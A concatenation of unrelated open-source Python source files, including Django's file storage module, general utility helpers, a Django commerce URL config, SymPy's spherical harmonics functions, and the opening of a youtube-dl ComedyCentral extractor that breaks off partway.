self._obj = zlib.decompressobj(zlib.MAX_WBITS)
def __getattr__(self, name):
return getattr(self._obj, name)
def decompress(self, data):
if not self._first_try:
return self._obj.decompress(data)
self._data += data
try:
return self._obj.decompress(data)
except zlib.error:
self._first_try = False
self._obj = zlib.decompressobj(-zlib.MAX_WBITS)
try:
return self.decompress(self._data)
finally:
self._data = None
|
import errno
import os
import warnings
from datetime import datetime
from django.conf import settings
from django.core.exceptions import SuspiciousFileOperation
from django.core.files import File, locks
from django.core.files.move import file_move_safe
from django.core.signals import setting_changed
from django.utils import timezone
from django.utils._os import abspathu, safe_join
from django.utils.crypto import get_random_string
from django.utils.deconstruct import deconstructible
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import filepath_to_uri, force_text
from django.utils.functional import LazyObject, cached_property
from django.utils.module_loading import import_string
from django.utils.six.moves.urllib.parse import urljoin
from django.utils.text import get_valid_filename
__all__ = ('Storage', 'FileSystemStorage', 'DefaultStorage', 'default_storage')
class Storage(object):
"""
A base storage class, providing some default behaviors that all other
storage systems can inherit or override, as necessary.
"""
# The following methods represent a public interface to private methods.
# These shouldn't be overridden by subclasses unless absolutely necessary.
def open(self, name, mode='rb'):
"""
Retrieves the specified file from storage.
"""
return self._open(name, mode)
def save(self, name, content, max_length=None):
"""
Saves new content to the file specified by name. The content should be
a proper File object or any python file-like object, ready to be read
from the beginning.
"""
# Get the proper name for the file, as it will actually be saved.
if name is None:
name = content.name
if not hasattr(content, 'chunks'):
content = File(content, name)
name = self.get_available_name(name, max_length=max_length)
return self._save(name, content)
# These methods are part of the public API, with default implementations.
def get_valid_name(self, name):
"""
Returns a filename, based on the provided filename, that's suitable for
use in the target storage system.
"""
return get_valid_filename(name)
def get_available_name(self, name, max_length=None):
"""
Returns a filename that's free on the target storage system, and
available for new content to be written to.
"""
dir_name, file_name = os.path.split(name)
file_root, file_ext = os.path.splitext(file_name)
# If the filename already exists, add an underscore and a random 7
# character alphanumeric string (before the file extension, if one
# exists) to the filename until the generated filename doesn't exist.
# Truncate original name if required, so the new filename does not
# exceed the max_length.
while self.exists(name) or (max_length and len(name) > max_length):
# file_ext includes the dot.
name = os.path.join(dir_name, "%s_%s%s" % (file_root, get_random_string(7), file_ext))
if max_length is None:
continue
# Truncate file_root if max_length exceeded.
truncation = len(name) - max_length
if truncation > 0:
file_root = file_root[:-truncation]
# Entire file_root was truncated in attempt to find an available filename.
if not file_root:
raise SuspiciousFileOperation(
'Storage can not find an available filename for "%s". '
'Please make sure that the corresponding file field '
'allows sufficient "max_length".' % name
)
name = os.path.join(dir_name, "%s_%s%s" % (file_root, get_random_string(7), file_ext))
return name
def generate_filename(self, filename):
"""
Validate the filename by calling get_valid_name() and return a filename
to be passed to the save() method.
"""
# `filename` may include a path as returned by FileField.upload_to.
dirname, filename = os.path.split(filename)
return os.path.normpath(os.path.join(dirname, self.get_valid_name(filename)))
def path(self, name):
"""
Returns a local filesystem path where the file can be retrieved using
Python's built-in open() function. Storage systems that can't be
accessed using open() should *not* implement this method.
"""
raise NotImplementedError("This backend doesn't support absolute paths.")
# The following methods form the public API for storage systems, but with
# no default implementations. Subclasses must implement *all* of these.
def delete(self, name):
"""
Deletes the specified file from the storage system.
"""
raise NotImplementedError('subclasses of Storage must provide a delete() method')
def exists(self, name):
"""
Returns True if a file referenced by the given name already exists in the
storage system, or False if the name is available for a new file.
"""
raise NotImplementedError('subclasses of Storage must provide an exists() method')
def listdir(self, path):
"""
Lists the contents of the specified path, returning a 2-tuple of lists;
the first item being directories, the second item being files.
"""
raise NotImplementedError('subclasses of Storage must provide a listdir() method')
def size(self, name):
"""
Returns the total size, in bytes, of the file specified by name.
"""
raise NotImplementedError('subclasses of Storage must provide a size() method')
def url(self, name):
"""
Returns an absolute URL where the file's contents can be accessed
directly by a Web browser.
"""
raise NotImplementedError('subclasses of Storage must provide a url() method')
def accessed_time(self, name):
"""
Returns the last accessed time (as datetime object) of the file
specified by name. Deprecated: use get_accessed_time() instead.
"""
warnings.warn(
'Storage.accessed_time() is deprecated in favor of get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide an accessed_time() method')
def created_time(self, name):
"""
Returns the creation time (as datetime object) of the file
specified by name. Deprecated: use get_created_time() instead.
"""
warnings.warn(
'Storage.created_time() is deprecated in favor of get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide a created_time() method')
def modified_time(self, name):
"""
Returns the last modified time (as datetime object) of the file
specified by name. Deprecated: use get_modified_time() instead.
"""
warnings.warn(
'Storage.modified_time() is deprecated in favor of get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide a modified_time() method')
def get_accessed_time(self, name):
"""
Return the last accessed time (as a datetime) of the file specified by
name. The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_accessed_time() method')
warnings.warn(
'Storage.accessed_time() is deprecated. '
'Storage backends should implement get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.accessed_time(name)
return _possibly_make_aware(dt)
def get_created_time(self, name):
"""
Return the creation time (as a datetime) of the file specified by name.
The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_created_time() method')
warnings.warn(
'Storage.created_time() is deprecated. '
'Storage backends should implement get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.created_time(name)
return _possibly_make_aware(dt)
def get_modified_time(self, name):
"""
Return the last modified time (as a datetime) of the file specified by
name. The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_modified_time() method')
warnings.warn(
'Storage.modified_time() is deprecated. '
'Storage backends should implement get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.modified_time(name)
return _possibly_make_aware(dt)
def _possibly_make_aware(dt):
"""
Convert a datetime object in the local timezone to aware
in UTC, if USE_TZ is True.
"""
# This function is only needed to help with the deprecations above and can
# be removed in Django 2.0, RemovedInDjango20Warning.
if settings.USE_TZ:
tz = timezone.get_default_timezone()
return timezone.make_aware(dt, tz).astimezone(timezone.utc)
else:
return dt
@deconstructible
class FileSystemStorage(Storage):
"""
Standard filesystem storage
"""
def __init__(self, location=None, base_url=None, file_permissions_mode=None,
directory_permissions_mode=None):
self._location = location
self._base_url = base_url
self._file_permissions_mode = file_permissions_mode
self._directory_permissions_mode = directory_permissions_mode
setting_changed.connect(self._clear_cached_properties)
def _clear_cached_properties(self, setting, **kwargs):
"""Reset setting based property values."""
if setting == 'MEDIA_ROOT':
self.__dict__.pop('base_location', None)
self.__dict__.pop('location', None)
elif setting == 'MEDIA_URL':
self.__dict__.pop('base_url', None)
elif setting == 'FILE_UPLOAD_PERMISSIONS':
self.__dict__.pop('file_permissions_mode', None)
elif setting == 'FILE_UPLOAD_DIRECTORY_PERMISSIONS':
self.__dict__.pop('directory_permissions_mode', None)
def _value_or_setting(self, value, setting):
return setting if value is None else value
@cached_property
def base_location(self):
return self._value_or_setting(self._location, settings.MEDIA_ROOT)
@cached_property
def location(self):
return abspathu(self.base_location)
@cached_property
def base_url(self):
if self._base_url is not None and not self._base_url.endswith('/'):
self._base_url += '/'
return self._value_or_setting(self._base_url, settings.MEDIA_URL)
@cached_property
def file_permissions_mode(self):
return self._value_or_setting(self._file_permissions_mode, settings.FILE_UPLOAD_PERMISSIONS)
@cached_property
def directory_permissions_mode(self):
return self._value_or_setting(self._directory_permissions_mode, settings.FILE_UPLOAD_DIRECTORY_PERMISSIONS)
def _open(self, name, mode='rb'):
return File(open(self.path(name), mode))
def _save(self, name, content):
full_path = self.path(name)
# Create any intermediate directories that do not exist.
# Note that there is a race between os.path.exists and os.makedirs:
# if os.makedirs fails with EEXIST, the directory was created
# concurrently, and we can continue normally. Refs #16082.
directory = os.path.dirname(full_path)
if not os.path.exists(directory):
try:
if self.directory_permissions_mode is not None:
# os.makedirs applies the global umask, so we reset it,
# for consistency with file_permissions_mode behavior.
old_umask = os.umask(0)
try:
os.makedirs(directory, self.directory_permissions_mode)
finally:
os.umask(old_umask)
else:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(directory):
raise IOError("%s exists and is not a directory." % directory)
# There's a potential race condition between get_available_name and
# saving the file; it's possible that two threads might return the
# same name, at which point all sorts of fun happens. So we need to
# try to create the file, but if it already exists we have to go back
# to get_available_name() and try again.
while True:
try:
# This file has a file path that we can move.
if hasattr(content, 'temporary_file_path'):
file_move_safe(content.temporary_file_path(), full_path)
# This is a normal uploadedfile that we can stream.
else:
# This fun binary flag incantation makes os.open throw an
# OSError if the file already exists before we open it.
flags = (os.O_WRONLY | os.O_CREAT | os.O_EXCL |
getattr(os, 'O_BINARY', 0))
# The current umask value is masked out by os.open!
fd = os.open(full_path, flags, 0o666)
_file = None
try:
locks.lock(fd, locks.LOCK_EX)
for chunk in content.chunks():
if _file is None:
mode = 'wb' if isinstance(chunk, bytes) else 'wt'
_file = os.fdopen(fd, mode)
_file.write(chunk)
finally:
locks.unlock(fd)
if _file is not None:
_file.close()
else:
os.close(fd)
except OSError as e:
if e.errno == errno.EEXIST:
# Ooops, the file exists. We need a new file name.
name = self.get_available_name(name)
full_path = self.path(name)
else:
raise
else:
# OK, the file save worked. Break out of the loop.
break
if self.file_permissions_mode is not None:
os.chmod(full_path, self.file_permissions_mode)
# Store filenames with forward slashes, even on Windows.
return force_text(name.replace('\\', '/'))
def delete(self, name):
assert name, "The name argument is not allowed to be empty."
name = self.path(name)
# If the file exists, delete it from the filesystem.
# If os.remove() fails with ENOENT, the file may have been removed
# concurrently, and it's safe to continue normally.
try:
os.remove(name)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def exists(self, name):
return os.path.exists(self.path(name))
def listdir(self, path):
path = self.path(path)
directories, files = [], []
for entry in os.listdir(path):
if os.path.isdir(os.path.join(path, entry)):
directories.append(entry)
else:
files.append(entry)
return directories, files
def path(self, name):
return safe_join(self.location, name)
def size(self, name):
return os.path.getsize(self.path(name))
def url(self, name):
if self.base_url is None:
raise ValueError("This file is not accessible via a URL.")
url = filepath_to_uri(name)
if url is not None:
url = url.lstrip('/')
return urljoin(self.base_url, url)
def accessed_time(self, name):
warnings.warn(
'FileSystemStorage.accessed_time() is deprecated in favor of '
'get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getatime(self.path(name)))
def created_time(self, name):
warnings.warn(
'FileSystemStorage.created_time() is deprecated in favor of '
'get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getctime(self.path(name)))
def modified_time(self, name):
warnings.warn(
'FileSystemStorage.modified_time() is deprecated in favor of '
'get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getmtime(self.path(name)))
def _datetime_from_timestamp(self, ts):
"""
If timezone support is enabled, make an aware datetime object in UTC;
otherwise make a naive one in the local timezone.
"""
if settings.USE_TZ:
# Safe to use .replace() because UTC doesn't have DST
return datetime.utcfromtimestamp(ts).replace(tzinfo=timezone.utc)
else:
return datetime.fromtimestamp(ts)
def get_accessed_time(self, name):
return self._datetime_from_timestamp(os.path.getatime(self.path(name)))
def get_created_time(self, name):
return self._datetime_from_timestamp(os.path.getctime(self.path(name)))
def get_modified_time(self, name):
return self._datetime_from_timestamp(os.path.getmtime(self.path(name)))
def get_storage_class(import_path=None):
return import_string(import_path or settings.DEFAULT_FILE_STORAGE)
class DefaultStorage(LazyObject):
def _setup(self):
self._wrapped = get_storage_class()()
default_storage = DefaultStorage()
|
"""Various utility classes and functions."""
import codecs
from datetime import timedelta, tzinfo
import os
import re
try:
set = set
except NameError:
from sets import Set as set
import textwrap
import time
from itertools import izip, imap
missing = object()
__all__ = ['distinct', 'pathmatch', 'relpath', 'wraptext', 'odict', 'UTC',
'LOCALTZ']
__docformat__ = 'restructuredtext en'
def distinct(iterable):
"""Yield all items in an iterable collection that are distinct.
Unlike when using sets for a similar effect, the original ordering of the
items in the collection is preserved by this function.
>>> print list(distinct([1, 2, 1, 3, 4, 4]))
[1, 2, 3, 4]
>>> print list(distinct('foobar'))
['f', 'o', 'b', 'a', 'r']
:param iterable: the iterable collection providing the data
:return: the distinct items in the collection
:rtype: ``iterator``
"""
seen = set()
for item in iter(iterable):
if item not in seen:
yield item
seen.add(item)
PYTHON_MAGIC_COMMENT_re = re.compile(
r'[ \t\f]* \# .* coding[=:][ \t]*([-\w.]+)', re.VERBOSE)
def parse_encoding(fp):
"""Deduce the encoding of a source file from magic comment.
It does this in the same way as the `Python interpreter`__
.. __: http://docs.python.org/ref/encodings.html
The ``fp`` argument should be a seekable file object.
(From Jeff Dairiki)
"""
pos = fp.tell()
fp.seek(0)
try:
line1 = fp.readline()
has_bom = line1.startswith(codecs.BOM_UTF8)
if has_bom:
line1 = line1[len(codecs.BOM_UTF8):]
m = PYTHON_MAGIC_COMMENT_re.match(line1)
if not m:
try:
import parser
parser.suite(line1)
except (ImportError, SyntaxError):
# Either it's a real syntax error, in which case the source is
# not valid python source, or line2 is a continuation of line1,
# in which case we don't want to scan line2 for a magic
# comment.
pass
else:
line2 = fp.readline()
m = PYTHON_MAGIC_COMMENT_re.match(line2)
if has_bom:
if m:
raise SyntaxError(
"python refuses to compile code with both a UTF8 "
"byte-order-mark and a magic encoding comment")
return 'utf_8'
elif m:
return m.group(1)
else:
return None
finally:
fp.seek(pos)
def pathmatch(pattern, filename):
"""Extended pathname pattern matching.
This function is similar to what is provided by the ``fnmatch`` module in
the Python standard library, but:
* can match complete (relative or absolute) path names, and not just file
names, and
* also supports a convenience pattern ("**") to match files at any
directory level.
Examples:
>>> pathmatch('**.py', 'bar.py')
True
>>> pathmatch('**.py', 'foo/bar/baz.py')
True
>>> pathmatch('**.py', 'templates/index.html')
False
>>> pathmatch('**/templates/*.html', 'templates/index.html')
True
>>> pathmatch('**/templates/*.html', 'templates/foo/bar.html')
False
:param pattern: the glob pattern
:param filename: the path name of the file to match against
:return: `True` if the path name matches the pattern, `False` otherwise
:rtype: `bool`
"""
symbols = {
'?': '[^/]',
'?/': '[^/]/',
'*': '[^/]+',
'*/': '[^/]+/',
'**/': '(?:.+/)*?',
'**': '(?:.+/)*?[^/]+',
}
buf = []
for idx, part in enumerate(re.split('([?*]+/?)', pattern)):
if idx % 2:
buf.append(symbols[part])
elif part:
buf.append(re.escape(part))
match = re.match(''.join(buf) + '$', filename.replace(os.sep, '/'))
return match is not None
class TextWrapper(textwrap.TextWrapper):
wordsep_re = re.compile(
r'(\s+|' # any whitespace
r'(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w))' # em-dash
)
def wraptext(text, width=70, initial_indent='', subsequent_indent=''):
"""Simple wrapper around the ``textwrap.wrap`` function in the standard
library. This version does not wrap lines on hyphens in words.
:param text: the text to wrap
:param width: the maximum line width
:param initial_indent: string that will be prepended to the first line of
wrapped output
:param subsequent_indent: string that will be prepended to all lines save
the first of wrapped output
:return: a list of lines
:rtype: `list`
"""
wrapper = TextWrapper(width=width, initial_indent=initial_indent,
subsequent_indent=subsequent_indent,
break_long_words=False)
return wrapper.wrap(text)
class odict(dict):
"""Ordered dict implementation.
:see: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/107747
"""
def __init__(self, data=None):
dict.__init__(self, data or {})
self._keys = dict.keys(self)
def __delitem__(self, key):
dict.__delitem__(self, key)
self._keys.remove(key)
def __setitem__(self, key, item):
dict.__setitem__(self, key, item)
if key not in self._keys:
self._keys.append(key)
def __iter__(self):
return iter(self._keys)
iterkeys = __iter__
def clear(self):
dict.clear(self)
self._keys = []
def copy(self):
d = odict()
d.update(self)
return d
def items(self):
return zip(self._keys, self.values())
def iteritems(self):
return izip(self._keys, self.itervalues())
def keys(self):
return self._keys[:]
def pop(self, key, default=missing):
if default is missing:
return dict.pop(self, key)
elif key not in self:
return default
self._keys.remove(key)
return dict.pop(self, key, default)
def popitem(self, key):
self._keys.remove(key)
return dict.popitem(key)
def setdefault(self, key, failobj = None):
dict.setdefault(self, key, failobj)
if key not in self._keys:
self._keys.append(key)
def update(self, dict):
for (key, val) in dict.items():
self[key] = val
def values(self):
return map(self.get, self._keys)
def itervalues(self):
return imap(self.get, self._keys)
try:
relpath = os.path.relpath
except AttributeError:
def relpath(path, start='.'):
"""Compute the relative path to one path from another.
>>> relpath('foo/bar.txt', '').replace(os.sep, '/')
'foo/bar.txt'
>>> relpath('foo/bar.txt', 'foo').replace(os.sep, '/')
'bar.txt'
>>> relpath('foo/bar.txt', 'baz').replace(os.sep, '/')
'../foo/bar.txt'
:return: the relative path
:rtype: `basestring`
"""
start_list = os.path.abspath(start).split(os.sep)
path_list = os.path.abspath(path).split(os.sep)
# Work out how much of the filepath is shared by start and path.
i = len(os.path.commonprefix([start_list, path_list]))
rel_list = [os.path.pardir] * (len(start_list) - i) + path_list[i:]
return os.path.join(*rel_list)
try:
from operator import attrgetter, itemgetter
except ImportError:
def itemgetter(name):
def _getitem(obj):
return obj[name]
return _getitem
try:
''.rsplit
def rsplit(a_string, sep=None, maxsplit=None):
return a_string.rsplit(sep, maxsplit)
except AttributeError:
def rsplit(a_string, sep=None, maxsplit=None):
parts = a_string.split(sep)
if maxsplit is None or len(parts) <= maxsplit:
return parts
maxsplit_index = len(parts) - maxsplit
non_splitted_part = sep.join(parts[:maxsplit_index])
splitted = parts[maxsplit_index:]
return [non_splitted_part] + splitted
ZERO = timedelta(0)
class FixedOffsetTimezone(tzinfo):
"""Fixed offset in minutes east from UTC."""
def __init__(self, offset, name=None):
self._offset = timedelta(minutes=offset)
if name is None:
name = 'Etc/GMT+%d' % offset
self.zone = name
def __str__(self):
return self.zone
def __repr__(self):
return '<FixedOffset "%s" %s>' % (self.zone, self._offset)
def utcoffset(self, dt):
return self._offset
def tzname(self, dt):
return self.zone
def dst(self, dt):
return ZERO
try:
from pytz import UTC
except ImportError:
UTC = FixedOffsetTimezone(0, 'UTC')
"""`tzinfo` object for UTC (Universal Time).
:type: `tzinfo`
"""
STDOFFSET = timedelta(seconds = -time.timezone)
if time.daylight:
DSTOFFSET = timedelta(seconds = -time.altzone)
else:
DSTOFFSET = STDOFFSET
DSTDIFF = DSTOFFSET - STDOFFSET
class LocalTimezone(tzinfo):
def utcoffset(self, dt):
if self._isdst(dt):
return DSTOFFSET
else:
return STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return DSTDIFF
else:
return ZERO
def tzname(self, dt):
return time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, -1)
stamp = time.mktime(tt)
tt = time.localtime(stamp)
return tt.tm_isdst > 0
LOCALTZ = LocalTimezone()
"""`tzinfo` object for local time-zone.
:type: `tzinfo`
"""
|
""" API v1 URLs. """
from django.conf import settings
from django.conf.urls import patterns, url, include
from commerce.api.v1 import views
COURSE_URLS = patterns(
'',
url(r'^$', views.CourseListView.as_view(), name='list'),
url(r'^{}/$'.format(settings.COURSE_ID_PATTERN), views.CourseRetrieveUpdateView.as_view(), name='retrieve_update'),
)
ORDER_URLS = patterns(
'',
url(r'^(?P<number>[-\w]+)/$', views.OrderView.as_view(), name='detail'),
)
urlpatterns = patterns(
'',
url(r'^courses/', include(COURSE_URLS, namespace='courses')),
url(r'^orders/', include(ORDER_URLS, namespace='orders')),
)
|
from __future__ import print_function, division
from sympy import pi, I
from sympy.core.singleton import S
from sympy.core import Dummy, sympify
from sympy.core.function import Function, ArgumentIndexError
from sympy.functions import assoc_legendre
from sympy.functions.elementary.trigonometric import sin, cos, cot
from sympy.functions.combinatorial.factorials import factorial
from sympy.functions.elementary.complexes import Abs
from sympy.functions.elementary.exponential import exp
from sympy.functions.elementary.miscellaneous import sqrt
_x = Dummy("x")
class Ynm(Function):
r"""
Spherical harmonics defined as
.. math::
Y_n^m(\theta, \varphi) := \sqrt{\frac{(2n+1)(n-m)!}{4\pi(n+m)!}}
\exp(i m \varphi)
\mathrm{P}_n^m\left(\cos(\theta)\right)
Ynm() gives the spherical harmonic function of order `n` and `m`
in `\theta` and `\varphi`, `Y_n^m(\theta, \varphi)`. The four
parameters are as follows: `n \geq 0` an integer and `m` an integer
such that `-n \leq m \leq n` holds. The two angles are real-valued
with `\theta \in [0, \pi]` and `\varphi \in [0, 2\pi]`.
Examples
========
>>> from sympy import Ynm, Symbol
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> Ynm(n, m, theta, phi)
Ynm(n, m, theta, phi)
Several symmetries are known, for the order
>>> from sympy import Ynm, Symbol
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> Ynm(n, -m, theta, phi)
(-1)**m*exp(-2*I*m*phi)*Ynm(n, m, theta, phi)
as well as for the angles
>>> from sympy import Ynm, Symbol, simplify
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> Ynm(n, m, -theta, phi)
Ynm(n, m, theta, phi)
>>> Ynm(n, m, theta, -phi)
exp(-2*I*m*phi)*Ynm(n, m, theta, phi)
For specific integers n and m we can evalute the harmonics
to more useful expressions
>>> simplify(Ynm(0, 0, theta, phi).expand(func=True))
1/(2*sqrt(pi))
>>> simplify(Ynm(1, -1, theta, phi).expand(func=True))
sqrt(6)*exp(-I*phi)*sin(theta)/(4*sqrt(pi))
>>> simplify(Ynm(1, 0, theta, phi).expand(func=True))
sqrt(3)*cos(theta)/(2*sqrt(pi))
>>> simplify(Ynm(1, 1, theta, phi).expand(func=True))
-sqrt(6)*exp(I*phi)*sin(theta)/(4*sqrt(pi))
>>> simplify(Ynm(2, -2, theta, phi).expand(func=True))
sqrt(30)*exp(-2*I*phi)*sin(theta)**2/(8*sqrt(pi))
>>> simplify(Ynm(2, -1, theta, phi).expand(func=True))
sqrt(30)*exp(-I*phi)*sin(2*theta)/(8*sqrt(pi))
>>> simplify(Ynm(2, 0, theta, phi).expand(func=True))
sqrt(5)*(3*cos(theta)**2 - 1)/(4*sqrt(pi))
>>> simplify(Ynm(2, 1, theta, phi).expand(func=True))
-sqrt(30)*exp(I*phi)*sin(2*theta)/(8*sqrt(pi))
>>> simplify(Ynm(2, 2, theta, phi).expand(func=True))
sqrt(30)*exp(2*I*phi)*sin(theta)**2/(8*sqrt(pi))
We can differentiate the functions with respect
to both angles
>>> from sympy import Ynm, Symbol, diff
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> diff(Ynm(n, m, theta, phi), theta)
m*cot(theta)*Ynm(n, m, theta, phi) + sqrt((-m + n)*(m + n + 1))*exp(-I*phi)*Ynm(n, m + 1, theta, phi)
>>> diff(Ynm(n, m, theta, phi), phi)
I*m*Ynm(n, m, theta, phi)
Further we can compute the complex conjugation
>>> from sympy import Ynm, Symbol, conjugate
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> conjugate(Ynm(n, m, theta, phi))
(-1)**(2*m)*exp(-2*I*m*phi)*Ynm(n, m, theta, phi)
To get back the well known expressions in spherical
coordinates we use full expansion
>>> from sympy import Ynm, Symbol, expand_func
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> expand_func(Ynm(n, m, theta, phi))
sqrt((2*n + 1)*factorial(-m + n)/factorial(m + n))*exp(I*m*phi)*assoc_legendre(n, m, cos(theta))/(2*sqrt(pi))
See Also
========
Ynm_c, Znm
References
==========
.. [1] http://en.wikipedia.org/wiki/Spherical_harmonics
.. [2] http://mathworld.wolfram.com/SphericalHarmonic.html
.. [3] http://functions.wolfram.com/Polynomials/SphericalHarmonicY/
.. [4] http://dlmf.nist.gov/14.30
"""
@classmethod
def eval(cls, n, m, theta, phi):
n, m, theta, phi = [sympify(x) for x in (n, m, theta, phi)]
# Handle negative index m and arguments theta, phi
if m.could_extract_minus_sign():
m = -m
return S.NegativeOne**m * exp(-2*I*m*phi) * Ynm(n, m, theta, phi)
if theta.could_extract_minus_sign():
theta = -theta
return Ynm(n, m, theta, phi)
if phi.could_extract_minus_sign():
phi = -phi
return exp(-2*I*m*phi) * Ynm(n, m, theta, phi)
# TODO Add more simplififcation here
def _eval_expand_func(self, **hints):
n, m, theta, phi = self.args
rv = (sqrt((2*n + 1)/(4*pi) * factorial(n - m)/factorial(n + m)) *
exp(I*m*phi) * assoc_legendre(n, m, cos(theta)))
# We can do this because of the range of theta
return rv.subs(sqrt(-cos(theta)**2 + 1), sin(theta))
def fdiff(self, argindex=4):
if argindex == 1:
# Diff wrt n
raise ArgumentIndexError(self, argindex)
elif argindex == 2:
# Diff wrt m
raise ArgumentIndexError(self, argindex)
elif argindex == 3:
# Diff wrt theta
n, m, theta, phi = self.args
return (m * cot(theta) * Ynm(n, m, theta, phi) +
sqrt((n - m)*(n + m + 1)) * exp(-I*phi) * Ynm(n, m + 1, theta, phi))
elif argindex == 4:
# Diff wrt phi
n, m, theta, phi = self.args
return I * m * Ynm(n, m, theta, phi)
else:
raise ArgumentIndexError(self, argindex)
def _eval_rewrite_as_polynomial(self, n, m, theta, phi):
# TODO: Make sure n \in N
# TODO: Assert |m| <= n ortherwise we should return 0
return self.expand(func=True)
def _eval_rewrite_as_sin(self, n, m, theta, phi):
return self.rewrite(cos)
def _eval_rewrite_as_cos(self, n, m, theta, phi):
# This method can be expensive due to extensive use of simplification!
from sympy.simplify import simplify, trigsimp
# TODO: Make sure n \in N
# TODO: Assert |m| <= n ortherwise we should return 0
term = simplify(self.expand(func=True))
# We can do this because of the range of theta
term = term.xreplace({Abs(sin(theta)):sin(theta)})
return simplify(trigsimp(term))
def _eval_conjugate(self):
# TODO: Make sure theta \in R and phi \in R
n, m, theta, phi = self.args
return S.NegativeOne**m * self.func(n, -m, theta, phi)
def as_real_imag(self, deep=True, **hints):
# TODO: Handle deep and hints
n, m, theta, phi = self.args
re = (sqrt((2*n + 1)/(4*pi) * factorial(n - m)/factorial(n + m)) *
cos(m*phi) * assoc_legendre(n, m, cos(theta)))
im = (sqrt((2*n + 1)/(4*pi) * factorial(n - m)/factorial(n + m)) *
sin(m*phi) * assoc_legendre(n, m, cos(theta)))
return (re, im)
def _eval_evalf(self, prec):
# Note: works without this function by just calling
# mpmath for Legendre polynomials. But using
# the dedicated function directly is cleaner.
from mpmath import mp, workprec
from sympy import Expr
n = self.args[0]._to_mpmath(prec)
m = self.args[1]._to_mpmath(prec)
theta = self.args[2]._to_mpmath(prec)
phi = self.args[3]._to_mpmath(prec)
with workprec(prec):
res = mp.spherharm(n, m, theta, phi)
return Expr._from_mpmath(res, prec)
def _sage_(self):
import sage.all as sage
return sage.spherical_harmonic(self.args[0]._sage_(),
self.args[1]._sage_(),
self.args[2]._sage_(),
self.args[3]._sage_())
def Ynm_c(n, m, theta, phi):
r"""Conjugate spherical harmonics defined as
.. math::
\overline{Y_n^m(\theta, \varphi)} := (-1)^m Y_n^{-m}(\theta, \varphi)
See Also
========
Ynm, Znm
References
==========
.. [1] http://en.wikipedia.org/wiki/Spherical_harmonics
.. [2] http://mathworld.wolfram.com/SphericalHarmonic.html
.. [3] http://functions.wolfram.com/Polynomials/SphericalHarmonicY/
"""
from sympy import conjugate
return conjugate(Ynm(n, m, theta, phi))
class Znm(Function):
r"""
Real spherical harmonics defined as
.. math::
Z_n^m(\theta, \varphi) :=
\begin{cases}
\frac{Y_n^m(\theta, \varphi) + \overline{Y_n^m(\theta, \varphi)}}{\sqrt{2}} &\quad m > 0 \\
Y_n^m(\theta, \varphi) &\quad m = 0 \\
\frac{Y_n^m(\theta, \varphi) - \overline{Y_n^m(\theta, \varphi)}}{i \sqrt{2}} &\quad m < 0 \\
\end{cases}
which gives in simplified form
.. math::
Z_n^m(\theta, \varphi) =
\begin{cases}
\frac{Y_n^m(\theta, \varphi) + (-1)^m Y_n^{-m}(\theta, \varphi)}{\sqrt{2}} &\quad m > 0 \\
Y_n^m(\theta, \varphi) &\quad m = 0 \\
\frac{Y_n^m(\theta, \varphi) - (-1)^m Y_n^{-m}(\theta, \varphi)}{i \sqrt{2}} &\quad m < 0 \\
\end{cases}
See Also
========
Ynm, Ynm_c
References
==========
.. [1] http://en.wikipedia.org/wiki/Spherical_harmonics
.. [2] http://mathworld.wolfram.com/SphericalHarmonic.html
.. [3] http://functions.wolfram.com/Polynomials/SphericalHarmonicY/
"""
@classmethod
def eval(cls, n, m, theta, phi):
n, m, th, ph = [sympify(x) for x in (n, m, theta, phi)]
if m.is_positive:
zz = (Ynm(n, m, th, ph) + Ynm_c(n, m, th, ph)) / sqrt(2)
return zz
elif m.is_zero:
return Ynm(n, m, th, ph)
elif m.is_negative:
zz = (Ynm(n, m, th, ph) - Ynm_c(n, m, th, ph)) / (sqrt(2)*I)
return zz
|
from __future__ import unicode_literals
import re
from .mtv import MTVServicesInfoExtractor
from ..compat import (
compat_str,
compat_urllib_parse,
)
from ..utils import (
ExtractorError,
float_or_none,
unified_strdate,
)
class ComedyCentralIE(MTVServicesInfoExtractor):
_VALID_URL = r'''(?x)https?://(?:www\.)?cc\.com/
(video-clips|episodes|cc-studios|video-collections|full-episodes)
/(?P<title>.*)'''
_FEED_URL = 'http://comedycentral.com/feeds/mrss/'
_TEST = {
'url': 'http://www.cc.com/video-clips/kllhuv/stand-up-greg-fitzsimmons--uncensored---too-good-of-a-mother',
'md5': 'c4f48e9eda1b16dd10add0744344b6d8',
'info_dict': {
